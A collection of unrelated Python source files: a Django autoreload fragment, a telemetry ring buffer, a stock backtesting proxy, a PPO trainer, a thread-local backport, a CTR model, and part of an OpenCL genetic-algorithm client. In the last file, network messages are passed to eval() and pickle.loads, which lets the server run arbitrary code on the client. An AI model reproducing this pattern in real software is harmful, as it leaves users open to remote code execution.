self.update_watches()
while True:
if self.processed_request.is_set():
self.update_watches()
self.processed_request.clear()
try:
self.client.receive()
except pywatchman.SocketTimeout:
pass
except pywatchman.WatchmanError as ex:
logger.debug('Watchman error: %s, checking server status.', ex)
self.check_server_status(ex)
else:
for sub in list(self.client.subs.keys()):
self._check_subscription(sub)
yield
def stop(self):
self.client.close()
super().stop()
def check_server_status(self, inner_ex=None):
"""Return True if the server is available."""
try:
self.client.query('version')
except Exception:
raise WatchmanUnavailable(str(inner_ex)) from inner_ex
return True
@classmethod
def check_availability(cls):
if not pywatchman:
raise WatchmanUnavailable('pywatchman not installed.')
client = pywatchman.client(timeout=0.1)
try:
result = client.capabilityCheck()
except Exception:
# The service is down?
raise WatchmanUnavailable('Cannot connect to the watchman service.')
version = get_version_tuple(result['version'])
# Watchman 4.9 includes multiple improvements to watching project
# directories as well as case insensitive filesystems.
logger.debug('Watchman version %s', version)
if version < (4, 9):
raise WatchmanUnavailable('Watchman 4.9 or later is required.')
def get_reloader():
"""Return the most suitable reloader for this environment."""
try:
WatchmanReloader.check_availability()
except WatchmanUnavailable:
return StatReloader()
return WatchmanReloader()
def start_django(reloader, main_func, *args, **kwargs):
ensure_echo_on()
main_func = check_errors(main_func)
django_main_thread = threading.Thread(target=main_func, args=args, kwargs=kwargs, name='django-main-thread')
django_main_thread.setDaemon(True)
django_main_thread.start()
while not reloader.should_stop:
try:
reloader.run(django_main_thread)
except WatchmanUnavailable as ex:
# It's possible that the watchman service shuts down or otherwise
# becomes unavailable. In that case, use the StatReloader.
reloader = StatReloader()
logger.error('Error connecting to Watchman: %s', ex)
logger.info('Watching for file changes with %s', reloader.__class__.__name__)
def run_with_reloader(main_func, *args, **kwargs):
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
try:
if os.environ.get(DJANGO_AUTORELOAD_ENV) == 'true':
reloader = get_reloader()
logger.info('Watching for file changes with %s', reloader.__class__.__name__)
start_django(reloader, main_func, *args, **kwargs)
else:
exit_code = restart_with_reloader()
sys.exit(exit_code)
except KeyboardInterrupt:
pass
|
telem_main.py
|
from multiprocessing import Process, Queue
from main_telem import telem_tools
import time
import numpy as np
GLOBAL_WINDOW_SIZE = 1000
def data_read_daemon(queue, ringbuf):
"""
Data reading process (psuedo-daemon)
Fills up window data, then triggers
window analysis process
"""
window_counter = GLOBAL_WINDOW_SIZE
data_counter = 0
print("Started Sensor Read Daemon")
while True:
# Expect some of the communications to be VERY slow
time.sleep(np.random.random()*0.01)
data = np.random.randint(0, 100) # Random data (temporary)
# print(data)
ringbuf.extend(np.array([data])) # place data in the ring buffer
window_counter -= 1 # Decrement local window size counter
if window_counter == 0:
# Process the data currently in the ring buffer
ring_data = ringbuf.get()
data_counter += 1
print("Buffer filled")
# print(ring_data)
window_counter = GLOBAL_WINDOW_SIZE
# Send off to window process function
pw = Process(target=process_window_data,
args=(ring_data, data_counter, queue))
pw.start()
def process_window_data(data, data_count, queue):
"""
Process for saving the windowed timeseries data
for analysis via metrics or streaming algorithms.
Places data on queue for long-term storage
"""
time.sleep(3) # Simulating data send delay (temporary)
print("large data read, saving...", data_count)
queue.put(data) # placing read data in the queue
def store_window_data(queue):
"""
Process for Saving the data in long-term storage
"""
while True:
if queue.empty() is True:
pass # nothing to do
else:
if queue.full() is True:
print("WARNING: QUEUE IS FULL")
print("taking off queue")
data = queue.get()
time.sleep(5) # Simulating data send delay (temporary)
print("Long term storage done")
if __name__ == '__main__':
"""
Main Loop of the telemetry system
Operated by a multiprocessing queue which reads/stores data
and uses a ring buffer in NumPy to create a window/snapshot
of time series data to process in algorithms or streaming
machine learning algorithms.
"""
# Main shared Queue and Ring Buffer
q = Queue()
ringbuf = telem_tools.RingBuffer(GLOBAL_WINDOW_SIZE)
# Start data read daemon
dr = Process(target=data_read_daemon, args=(q,ringbuf))
dr.start()
# Start write daemon
wr = Process(target=store_window_data, args=(q,))
wr.start()
while True:
time.sleep(0.1)
# This is the place where your main loop or logic goes
|
DyStockBackTestingStrategyEngineProxy.py
|
import multiprocessing
import threading
import queue
from .DyStockBackTestingStrategyEngineProcess import *
from Stock.Config.DyStockConfig import DyStockConfig
class DyStockBackTestingStrategyEngineProxy(threading.Thread):
""" 以进程方式启动一个周期的策略回测 """
def __init__(self, eventEngine):
super().__init__()
self._eventEngine = eventEngine
self._ctx = multiprocessing.get_context('spawn')
self._queue = self._ctx.Queue() # queue to receive event from child processes
self._processes = []
self._childQueues = []
self.start()
def run(self):
while True:
event = self._queue.get()
self._eventEngine.put(event)
def startBackTesting(self, reqData):
childQueue = self._ctx.Queue()
self._childQueues.append(childQueue)
config = DyStockConfig.getConfigForBackTesting()
p = self._ctx.Process(target=dyStockBackTestingStrategyEngineProcess, args=(self._queue, childQueue, reqData, config))
p.start()
self._processes.append(p)
class DyStockBackTestingStrategyEngineProxyThread(threading.Thread):
""" 以线程方式启动一个周期的策略回测, 主要做调试用 """
def __init__(self, eventEngine):
super().__init__()
self._eventEngine = eventEngine
self._queue = queue.Queue() # queue to receive event from child threads
self._threads = []
self._childQueues = []
self.start()
def run(self):
while True:
event = self._queue.get()
self._eventEngine.put(event)
def startBackTesting(self, reqData):
childQueue = queue.Queue()
self._childQueues.append(childQueue)
t = threading.Thread(target=dyStockBackTestingStrategyEngineProcess, args=(self._queue, childQueue, reqData))
t.start()
self._threads.append(t)
|
ppo_continuous_multiprocess.py
|
'''
PPO
'''
import math
import random
import gym
import numpy as np
import torch
torch.multiprocessing.set_start_method('forkserver', force=True) # critical for make multiprocessing work
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions import Normal, MultivariateNormal
from IPython.display import clear_output
import matplotlib.pyplot as plt
from matplotlib import animation
from IPython.display import display
from reacher import Reacher
import argparse
import time
import torch.multiprocessing as mp
from torch.multiprocessing import Process
from multiprocessing import Process, Manager
from multiprocessing.managers import BaseManager
import threading as td
GPU = True
device_idx = 0
if GPU:
device = torch.device("cuda:" + str(device_idx) if torch.cuda.is_available() else "cpu")
else:
device = torch.device("cpu")
print(device)
parser = argparse.ArgumentParser(description='Train or test neural net motor controller.')
parser.add_argument('--train', dest='train', action='store_true', default=False)
parser.add_argument('--test', dest='test', action='store_true', default=False)
args = parser.parse_args()
##################### hyper parameters ####################
ENV_NAME = 'Pendulum-v0' # environment name
RANDOMSEED = 2 # random seed
EP_MAX = 1000 # total number of episodes for training
EP_LEN = 200 # total number of steps for each episode
GAMMA = 0.9 # reward discount
A_LR = 0.0001 # learning rate for actor
C_LR = 0.0002 # learning rate for critic
BATCH = 128 # update batchsize
A_UPDATE_STEPS = 10 # actor update steps
C_UPDATE_STEPS = 10 # critic update steps
EPS = 1e-8 # numerical residual
MODEL_PATH = 'model/ppo_multi'
NUM_WORKERS=2 # or: mp.cpu_count()
ACTION_RANGE = 1. # if unnormalized, normalized action range should be 1.
METHOD = [
dict(name='kl_pen', kl_target=0.01, lam=0.5), # KL penalty
dict(name='clip', epsilon=0.2), # Clipped surrogate objective, find this is better
][0] # choose the method for optimization
############################### PPO ####################################
class AddBias(nn.Module):
def __init__(self, bias):
super(AddBias, self).__init__()
self._bias = nn.Parameter(bias.unsqueeze(1))
def forward(self, x):
if x.dim() == 2:
bias = self._bias.t().view(1, -1)
else:
bias = self._bias.t().view(1, -1, 1, 1)
return x + bias
class ValueNetwork(nn.Module):
def __init__(self, state_dim, hidden_dim, init_w=3e-3):
super(ValueNetwork, self).__init__()
self.linear1 = nn.Linear(state_dim, hidden_dim)
# self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
self.linear4 = nn.Linear(hidden_dim, 1)
# weights initialization
self.linear4.weight.data.uniform_(-init_w, init_w)
self.linear4.bias.data.uniform_(-init_w, init_w)
def forward(self, state):
x = F.relu(self.linear1(state))
# x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
x = self.linear4(x)
return x
class PolicyNetwork(nn.Module):
def __init__(self, num_inputs, num_actions, hidden_dim, action_range=1., init_w=3e-3, log_std_min=-20, log_std_max=2):
super(PolicyNetwork, self).__init__()
self.log_std_min = log_std_min
self.log_std_max = log_std_max
self.linear1 = nn.Linear(num_inputs, hidden_dim)
self.linear2 = nn.Linear(hidden_dim, hidden_dim)
# self.linear3 = nn.Linear(hidden_dim, hidden_dim)
# self.linear4 = nn.Linear(hidden_dim, hidden_dim)
self.mean_linear = nn.Linear(hidden_dim, num_actions)
# implementation 1
# self.log_std_linear = nn.Linear(hidden_dim, num_actions)
# # implementation 2: not dependent on latent features, reference:https://github.com/ikostrikov/pytorch-a2c-ppo-acktr-gail/blob/master/a2c_ppo_acktr/distributions.py
self.log_std = AddBias(torch.zeros(num_actions))
self.num_actions = num_actions
self.action_range = action_range
def forward(self, state):
x = F.relu(self.linear1(state))
x = F.relu(self.linear2(x))
# x = F.relu(self.linear3(x))
# x = F.relu(self.linear4(x))
mean = self.action_range * F.tanh(self.mean_linear(x))
# implementation 1
# log_std = self.log_std_linear(x)
# log_std = torch.clamp(log_std, self.log_std_min, self.log_std_max)
# implementation 2
zeros = torch.zeros(mean.size())
if state.is_cuda:
zeros = zeros.cuda()
log_std = self.log_std(zeros)
return mean, log_std
def get_action(self, state, deterministic=False):
state = torch.FloatTensor(state).unsqueeze(0).to(device)
mean, log_std = self.forward(state)
std = log_std.exp()
normal = Normal(0, 1)
z = normal.sample()
action = mean+std*z
action = torch.clamp(action, -self.action_range, self.action_range)
return action.squeeze(0)
def sample_action(self,):
a=torch.FloatTensor(self.num_actions).uniform_(-1, 1)
return a.numpy()
class NormalizedActions(gym.ActionWrapper):
def _action(self, action):
low = self.action_space.low
high = self.action_space.high
action = low + (action + 1.0) * 0.5 * (high - low)
action = np.clip(action, low, high)
return action
def _reverse_action(self, action):
low = self.action_space.low
high = self.action_space.high
action = 2 * (action - low) / (high - low) - 1
action = np.clip(action, low, high)
return action
class PPO(object):
'''
PPO class
'''
def __init__(self, state_dim, action_dim, hidden_dim=512, a_lr=3e-4, c_lr=3e-4):
self.actor = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
self.actor_old = PolicyNetwork(state_dim, action_dim, hidden_dim, ACTION_RANGE).to(device)
self.critic = ValueNetwork(state_dim, hidden_dim).to(device)
self.actor_optimizer = optim.Adam(self.actor.parameters(), lr=a_lr)
self.critic_optimizer = optim.Adam(self.critic.parameters(), lr=c_lr)
print(self.actor, self.critic)
def a_train(self, s, a, adv):
'''
Update policy network
:param s: state
:param a: action
:param adv: advantage
:return:
'''
mu, log_std = self.actor(s)
pi = Normal(mu, torch.exp(log_std))
mu_old, log_std_old = self.actor_old(s)
oldpi = Normal(mu_old, torch.exp(log_std_old))
# ratio = torch.exp(pi.log_prob(a) - oldpi.log_prob(a)) # sometimes give nan
ratio = torch.exp(pi.log_prob(a)) / (torch.exp(oldpi.log_prob(a)) + EPS)
surr = ratio * adv
if METHOD['name'] == 'kl_pen':
lam = METHOD['lam']
kl = torch.distributions.kl.kl_divergence(oldpi, pi)
kl_mean = kl.mean()
aloss = -((surr - lam * kl).mean())
else: # clipping method, find this is better
aloss = -torch.mean(torch.min(surr, torch.clamp(ratio, 1. - METHOD['epsilon'], 1. + METHOD['epsilon']) * adv))
self.actor_optimizer.zero_grad()
aloss.backward()
self.actor_optimizer.step()
if METHOD['name'] == 'kl_pen':
return kl_mean
def update_old_pi(self):
'''
Update old policy parameter
:return: None
'''
for p, oldp in zip(self.actor.parameters(), self.actor_old.parameters()):
oldp.data.copy_(p)
def c_train(self, cumulative_r, s):
'''
Update actor network
:param cumulative_r: cumulative reward
:param s: state
:return: None
'''
v = self.critic(s)
advantage = cumulative_r - v
closs = (advantage**2).mean()
self.critic_optimizer.zero_grad()
closs.backward()
self.critic_optimizer.step()
def cal_adv(self, s, cumulative_r):
'''
Calculate advantage
:param s: state
:param cumulative_r: cumulative reward
:return: advantage
'''
advantage = cumulative_r - self.critic(s)
return advantage.detach()
def update(self, s, a, r):
'''
Update parameter with the constraint of KL divergent
:param s: state
:param a: act
:param r: reward
:return: None
'''
s = torch.FloatTensor(s).to(device)
a = torch.FloatTensor(a).to(device)
r = torch.FloatTensor(r).to(device)
self.update_old_pi()
adv = self.cal_adv(s, r)
# adv = (adv - adv.mean())/(adv.std()+1e-6) # sometimes helpful
# update actor
if METHOD['name'] == 'kl_pen':
for _ in range(A_UPDATE_STEPS):
kl = self.a_train(s, a, adv)
if kl > 4 * METHOD['kl_target']: # this in in google's paper
break
if kl < METHOD['kl_target'] / 1.5: # adaptive lambda, this is in OpenAI's paper
METHOD['lam'] /= 2
elif kl > METHOD['kl_target'] * 1.5:
METHOD['lam'] *= 2
METHOD['lam'] = np.clip(
METHOD['lam'], 1e-4, 10
) # sometimes explode, this clipping is MorvanZhou's solution
else: # clipping method, find this is better (OpenAI's paper)
for _ in range(A_UPDATE_STEPS):
self.a_train(s, a, adv)
# update critic
for _ in range(C_UPDATE_STEPS):
self.c_train(r, s)
def choose_action(self, s):
'''
Choose action
:param s: state
:return: clipped act
'''
a = self.actor.get_action(s)
return a.detach().cpu().numpy()
def get_v(self, s):
'''
Compute value
:param s: state
:return: value
'''
s = s.astype(np.float32)
if s.ndim < 2: s = s[np.newaxis, :]
s = torch.FloatTensor(s).to(device)
return self.critic(s).squeeze(0).detach().cpu().numpy()
def save_model(self, path):
torch.save(self.actor.state_dict(), path+'_actor')
torch.save(self.critic.state_dict(), path+'_critic')
torch.save(self.actor_old.state_dict(), path+'_actor_old')
def load_model(self, path):
self.actor.load_state_dict(torch.load(path+'_actor'))
self.critic.load_state_dict(torch.load(path+'_critic'))
self.actor_old.load_state_dict(torch.load(path+'_actor_old'))
self.actor.eval()
self.critic.eval()
self.actor_old.eval()
def ShareParameters(adamoptim):
''' share parameters of Adamoptimizers for multiprocessing '''
for group in adamoptim.param_groups:
for p in group['params']:
state = adamoptim.state[p]
# initialize: have to initialize here, or else cannot find
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p.data)
state['exp_avg_sq'] = torch.zeros_like(p.data)
# share in memory
state['exp_avg'].share_memory_()
state['exp_avg_sq'].share_memory_()
def plot(rewards):
clear_output(True)
plt.figure(figsize=(10,5))
plt.plot(rewards)
plt.savefig('ppo_multi.png')
# plt.show()
plt.clf()
def worker(id, ppo, rewards_queue):
env = gym.make(ENV_NAME).unwrapped
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
all_ep_r = []
for ep in range(EP_MAX):
s = env.reset()
buffer={
'state':[],
'action':[],
'reward':[]
}
ep_r = 0
t0 = time.time()
for t in range(EP_LEN): # in one episode
# env.render()
a = ppo.choose_action(s)
s_, r, done, _ = env.step(a)
buffer['state'].append(s)
buffer['action'].append(a)
# buffer['reward'].append(r)
buffer['reward'].append((r + 8) / 8) # normalize reward, find to be useful sometimes; from my experience, it works with 'penalty' version, while 'clip' verison works without this normalization
s = s_
ep_r += r
# update ppo
if (t + 1) % BATCH == 0 or t == EP_LEN - 1 or done:
if done:
v_s_=0
else:
v_s_ = ppo.get_v(s_)[0]
discounted_r = []
for r in buffer['reward'][::-1]:
v_s_ = r + GAMMA * v_s_
discounted_r.append(v_s_)
discounted_r.reverse()
bs, ba, br = np.vstack(buffer['state']), np.vstack(buffer['action']), np.array(discounted_r)[:, np.newaxis]
buffer['state'], buffer['action'], buffer['reward'] = [], [], []
ppo.update(bs, ba, br)
if done:
break
if ep == 0:
all_ep_r.append(ep_r)
else:
all_ep_r.append(all_ep_r[-1] * 0.9 + ep_r * 0.1)
if ep%50==0:
ppo.save_model(MODEL_PATH)
print(
'Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
ep, EP_MAX, ep_r,
time.time() - t0
)
)
rewards_queue.put(ep_r)
ppo.save_model(MODEL_PATH)
env.close()
def main():
# reproducible
# env.seed(RANDOMSEED)
np.random.seed(RANDOMSEED)
torch.manual_seed(RANDOMSEED)
env = NormalizedActions(gym.make(ENV_NAME).unwrapped)
state_dim = env.observation_space.shape[0]
action_dim = env.action_space.shape[0]
ppo = PPO(state_dim, action_dim, hidden_dim=128)
if args.train:
ppo.actor.share_memory()
ppo.actor_old.share_memory()
ppo.critic.share_memory()
ShareParameters(ppo.actor_optimizer)
ShareParameters(ppo.critic_optimizer)
rewards_queue=mp.Queue() # used for get rewards from all processes and plot the curve
processes=[]
rewards=[]
for i in range(NUM_WORKERS):
process = Process(target=worker, args=(i, ppo, rewards_queue)) # the args contain shared and not shared
process.daemon=True # all processes closed when the main stops
processes.append(process)
[p.start() for p in processes]
while True: # keep geting the episode reward from the queue
r = rewards_queue.get()
if r is not None:
if len(rewards) == 0:
rewards.append(r)
else:
rewards.append(rewards[-1] * 0.9 + r * 0.1)
else:
break
if len(rewards)%20==0 and len(rewards)>0:
plot(rewards)
[p.join() for p in processes] # finished at the same time
ppo.save_model(MODEL_PATH)
if args.test:
ppo.load_model(MODEL_PATH)
while True:
s = env.reset()
for i in range(EP_LEN):
env.render()
s, r, done, _ = env.step(ppo.choose_action(s))
if done:
break
if __name__ == '__main__':
main()
|
_cpthreadinglocal.py
|
# This is a backport of Python-2.4's threading.local() implementation
"""Thread-local objects
(Note that this module provides a Python version of thread
threading.local class. Depending on the version of Python you're
using, there may be a faster one available. You should always import
the local class from threading.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = mydata.__dict__.items()
... items.sort()
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... initialized = False
... def __init__(self, **kw):
... if self.initialized:
... raise SystemError('__init__ called too many times')
... self.initialized = True
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red'), ('initialized', True)], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
# Threading import is at end
class _localbase(object):
__slots__ = '_local__key', '_local__args', '_local__lock'
def __new__(cls, *args, **kw):
self = object.__new__(cls)
key = 'thread.local.' + str(id(self))
object.__setattr__(self, '_local__key', key)
object.__setattr__(self, '_local__args', (args, kw))
object.__setattr__(self, '_local__lock', RLock())
if args or kw and (cls.__init__ is object.__init__):
raise TypeError("Initialization arguments are not supported")
# We need to create the thread dict in anticipation of
# __init__ being called, to make sure we don't call it
# again ourselves.
dict = object.__getattribute__(self, '__dict__')
currentThread().__dict__[key] = dict
return self
def _patch(self):
key = object.__getattribute__(self, '_local__key')
d = currentThread().__dict__.get(key)
if d is None:
d = {}
currentThread().__dict__[key] = d
object.__setattr__(self, '__dict__', d)
# we have a new instance dict, so call out __init__ if we have
# one
cls = type(self)
if cls.__init__ is not object.__init__:
args, kw = object.__getattribute__(self, '_local__args')
cls.__init__(self, *args, **kw)
else:
object.__setattr__(self, '__dict__', d)
class local(_localbase):
def __getattribute__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__getattribute__(self, name)
finally:
lock.release()
def __setattr__(self, name, value):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__setattr__(self, name, value)
finally:
lock.release()
def __delattr__(self, name):
lock = object.__getattribute__(self, '_local__lock')
lock.acquire()
try:
_patch(self)
return object.__delattr__(self, name)
finally:
lock.release()
def __del__():
threading_enumerate = enumerate
__getattribute__ = object.__getattribute__
def __del__(self):
key = __getattribute__(self, '_local__key')
try:
threads = list(threading_enumerate())
except:
# if enumerate fails, as it seems to do during
# shutdown, we'll skip cleanup under the assumption
# that there is nothing to clean up
return
for thread in threads:
try:
__dict__ = thread.__dict__
except AttributeError:
# Thread is dying, rest in peace
continue
if key in __dict__:
try:
del __dict__[key]
except KeyError:
pass # didn't have anything in this thread
return __del__
__del__ = __del__()
from threading import currentThread, enumerate, RLock
|
deepctr.py
|
import multiprocessing
import tensorflow as tf
import tef
import tef.ops
import tef.training
batch_queue = multiprocessing.Queue(maxsize=5000)
def load_data():
global batch_queue
with open("data.txt") as fp:
for line in fp.readlines():
columns = line.split(",")
assert len(columns) == 6
kv = {}
for i in range(len(columns)):
column = columns[i].strip()
items = column.split(":")
assert len(items) == 2
key = items[0]
values = items[1].split("|")
assert len(values) > 0
for k in range(len(values)):
values[k] = int(values[k])
if key == "interest" or key == "ad_kw":
while len(values) < 5:
values.append(0)
kv[key] = values
print kv
batch_queue.put((kv["uid"][0], kv["age"][0], kv["interest"], kv["aid"][0], kv["ad_kw"], kv["label"]))
def data_generator():
global batch_queue
while True:
yield batch_queue.get()
def data_from_feed():
data_set = tf.data.Dataset.from_generator(data_generator, (tf.int64, tf.int64, tf.int64, tf.int64, tf.int64, tf.float32))
#data_set = data_set.padded_batch(4, padded_shapes=[None])
data_set = data_set.batch(5)
iterator = tf.compat.v1.data.make_one_shot_iterator(data_set)
return iterator.get_next()
def full_connect(name, input, input_dim, output_dim):
w = tef.ops.variable("%s_w_%dx%d" % (name, input_dim, output_dim), [input_dim, output_dim], tf.float32)
b = tef.ops.variable("%s_b_%d" % (name, output_dim), [output_dim], tf.float32)
return tf.sigmoid(tf.matmul(input, w) + b)
def dense_to_sparse(dense, missing_element):
indices = tf.where(tf.not_equal(dense, missing_element))
values = tf.gather_nd(dense, indices)
shape = tf.shape(dense, out_type=tf.int64)
return tf.SparseTensor(indices, values, shape)
def deep_ctr():
graph = tf.Graph()
with graph.as_default():
uid, age, interest, aid, ad_kw, label = data_from_feed()
embs = []
uid_emb = tef.ops.embedding(uid, "uid", [20], tf.float32, id_type="hash")
embs.append(uid_emb)
age_emb = tef.ops.embedding(age, "age", [120, 20], tf.float32, id_type="index")
embs.append(age_emb)
sp_interest = dense_to_sparse(interest, 0)
interest_emb = tef.ops.embedding_sparse(sp_interest,
"interest",
[20],
tf.float32,
id_type="hash",
combiner="mean")
embs.append(interest_emb)
aid_emb = tef.ops.embedding(aid, "aid", [20], tf.float32, id_type="hash")
embs.append(aid_emb)
sp_ad_kw = dense_to_sparse(ad_kw, 0)
ad_kw_emb = tef.ops.embedding_sparse(sp_ad_kw,
"ad_kw",
[20],
tf.float32,
id_type="hash",
combiner="mean")
embs.append(ad_kw_emb)
x = tf.concat(embs, axis=1)
x = full_connect("fc_1", x, 5 * 20, 100)
x = full_connect("fc_2", x, 100, 100)
y = full_connect("fc_3", x, 100, 1)
loss = tf.nn.sigmoid_cross_entropy_with_logits(y, label)
loss_mean = tf.reduce_mean(loss)
sgd_optimizer = tef.training.GradientDescentOptimizer(0.002)
gs, stubs = sgd_optimizer.compute_gradients(loss)
train_op = sgd_optimizer.apply_gradients(gs, stubs)
sess = tf.compat.v1.Session(graph = graph)
batch = 0
while batch < 10:
loss_value, _ = sess.run([loss_mean, train_op])
print "batch=%d, loss=%f" % (batch, loss_value)
batch += 1
if __name__ == '__main__':
data_load_process = multiprocessing.Process(target=load_data)
data_load_process.daemon = True
data_load_process.start()
deep_ctr()
|
ocl_ga_client.py
|
#!/usr/bin/python3
import traceback
import argparse
import pickle
import pyopencl as cl
from pyopencl import device_info as di
import random
import tempfile
import time
import uuid
from multiprocessing import Process, Pipe, Value, Event
from .ocl_ga import OpenCLGA
from .utilities.generaltaskthread import Logger
from .utilities.socketserverclient import Client, OP_MSG_BEGIN, OP_MSG_END
oclClient = None
## Queuy the list of platforms and the list of devices for specific platform.
def query_devices(c_p):
import pyopencl as cl
platforms = cl.get_platforms()
devices = platforms[0].get_devices()
data = []
for pidx in range(len(platforms)):
devices = platforms[pidx].get_devices()
for didx in range(len(devices)):
data.append((pidx, didx))
c_p.send(data)
## OpenCLGAWorker is a spawned process which is supposed to run OpenCLGA on a
# target device which is decided by OpenCLGAClient.
# @param platform_index Platform index which is queried and assigned by Client.
# @param device_index Device index which is queried and assigned by Client.
# @param ip The IP of server.
# @param port The listening port of server.
# @var exit_evt A event to wait in method run(), and will be set when receving
# 'exit' command, or terminating.
# @var uuid A unique ID for UI to identify the worker.
# @var running A varialbe shared by client & worker process to identify if worker
# is running or not.
class OpenCLGAWorker(Process, Logger):
def __init__(self, platform_index, device_index, ip, port):
Process.__init__(self)
Logger.__init__(self)
# self.logger_level ^= Logger.MSG_VERBOSE
self.daemon = True
self.exit_evt = Event()
self.running = Value('i', 0)
self.platform_index = platform_index
self.device_index = device_index
self.ip = ip
self.port = port
self.uuid = uuid.uuid1().hex
self.ocl_ga = None
## Terminate worker process, this should be only called when OpenCLGAClient
# is shutting down. The exti_evt will be set to break the wait in the
# process's run.
def terminate(self):
self.exit_evt.set()
while self.running.value:
time.sleep(0.1)
super(OpenCLGAWorker, self).terminate()
## The actual execution place in worker process.
# First, mark the process as running.
# Second, create opencl context according to the platform, device indices.
# Third, create a socket client as the communication channel to server.
def run(self):
self.running.value = 1
random.seed()
try:
self.__create_context()
self.info('Worker created for context {}'.format(self.device.name))
self.info('Worker [{0}] connect to server {1}:{2}'.format(
self.device.name, self.ip, self.port))
except:
self.error('Create OpenCL context failed !')
return
try:
self.client = Client(self.ip, self.port, { 'pre' : OP_MSG_BEGIN,
'post': OP_MSG_END,
'callback' : self._process_data })
self.__notify_client_online(self.client.get_address())
self.info('Worker [{0}] wait for commands'.format(self.device.name))
# If client is terminated by ctrl+c, exception will be caught in
# worker process.
self.exit_evt.wait()
except ConnectionRefusedError:
self.error('Connection refused! Please check Server status.')
self.client = None
except KeyboardInterrupt:
pass
finally:
self.__shutdown()
## Create opencl context according to specific information.
def __create_context(self):
self.platform = cl.get_platforms()[self.platform_index]
assert self.platform is not None
self.device = self.platform.get_devices()[self.device_index]
assert self.device is not None
self.dev_type = self.device.get_info(di.TYPE)
self.context = cl.Context(devices=[self.device])
return self.context
## Create opencl context according to specific information.
def __send_and_dump_info(self, index, data):
assert self.ocl_ga != None
self.verbose('{0}\t\t==> {1} ~ {2} ~ {3}'.format(index, data['best'], data['avg'],
data['worst']))
self.__send({'type' : 'generationResult',
'data' : { 'worker' : self.uuid,
'result' : { 'best_fitness' : data['best'],
'avg_fitness' : data['avg'],
'worst_fitness': data['worst'],
'best_result' : data['best_result'] }}})
## The callback funciton for OpenCLGA to notify state change.
def _state_changed(self, state):
self.__send({'type' : 'stateChanged',
'data' : { 'worker' : self.uuid,
'state' : state}})
## Create OpenCLGA instance with options
# @param options Algorithm setup information
def __create_ocl_ga(self, options):
options['cl_context'] = self.context
options['generation_callback'] = self.__send_and_dump_info
self.ocl_ga = OpenCLGA(options,
action_callbacks={ 'state' : self._state_changed })
self.ocl_ga.prepare()
self.info('Worker [{}]: oclGA prepared'.format(self.device.name))
## Receive raw data from server and take actions accordingly.
# @param data A string-like bytearray object which can be converted to
# dictionary. Two keys should be included. 1) 'command' 2) 'data'
def _process_data(self, data):
msg = str(data, 'ASCII')
dict_msg = eval(msg)
cmd = dict_msg['command']
payload = dict_msg['data']
self.verbose('Worker [{}]: cmd received = {}'.format(self.device.name, cmd))
if cmd in ['pause', 'stop', 'restore', 'best', 'save', 'statistics', 'elites'] and not self.ocl_ga:
self.error('Cmd "{}" will only be processed if ocl_ga exists '.format(cmd))
return
try:
if cmd == 'prepare':
self.__create_ocl_ga(pickle.loads(payload))
elif cmd == 'pause':
self.ocl_ga.pause()
elif cmd == 'stop':
self.ocl_ga.stop()
elif cmd == 'restore':
self.ocl_ga.restore(payload)
elif cmd == 'save':
# NOTE : Need to think about this ... too large !
# state_file = tempfile.NamedTemporaryFile(delete=False)
self.ocl_ga.save(payload)
# saved_filename = state_file.name
# with open(state_file.name, 'rb') as fd:
self.__send({'type': 'save',
'result': None})
# state_file.close()
elif cmd == 'best':
chromesome_kernel, best_fitness, best_chromosome = self.ocl_ga.get_the_best()
self.__send({'type': 'best',
'data': { 'worker': self.uuid,
'result': pickle.dumps(best_chromosome),
'kernel_result': repr(chromesome_kernel) }})
elif cmd == 'statistics':
self.__send({'type': 'statistics',
'result': self.ocl_ga.get_statistics()})
elif cmd == 'run':
prob_mutate, prob_cross = payload
self.info('Worker [{}]: oclGA run with {}/{}'.format(self.device.name,
prob_mutate, prob_cross))
self.ocl_ga.run(prob_mutate, prob_cross)
elif cmd == 'elites':
self.ocl_ga.update_elites(pickle.loads(payload))
elif cmd == 'exit':
self.exit_evt.set()
